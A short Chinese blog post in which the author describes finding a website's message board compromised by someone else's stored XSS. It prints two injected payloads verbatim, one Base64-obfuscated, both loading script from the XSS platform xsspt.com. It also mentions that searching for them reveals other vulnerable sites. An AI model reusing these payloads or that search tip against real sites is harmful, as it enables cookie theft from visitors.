之前发现了一个网站的留言板功能可以实施保存型XSS注入,昨天晚上又去看了一下这个网站,结果发现这网站被另一个哥们注入了
<dt class="hfinfo"><img src="x" onerror="eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL0NMUVh1Uj8nK01hdGgucmFuZG9tKCk='))"></dt>
这是用Base64编码的
<dt><span>xxx回复:<script src="//xsspt.com/CLQXuR"></script></span></dt>
查了一下,xsspt这个网站是个专门的XSS平台
百度搜索上面两段代码能查到一些可以注入的网站。。
感觉自己对于安全这块还是一知半解,虽然也下了sqlmap和burp suite玩了一下,但是对于真正的渗透实战还是摸不着头脑,有时候看别人的实战有些术语也是看不懂。可以考虑自己建个网站自己攻击看看,增加一些实战经验。不管怎么说,熟悉后端的话肯定对这个有帮助。感觉自己对移动安全也是挺有兴趣,看来要学的东西还是比较多啊。
看了一些这方面的资料,感觉自己以前建的网站到处都是漏洞。。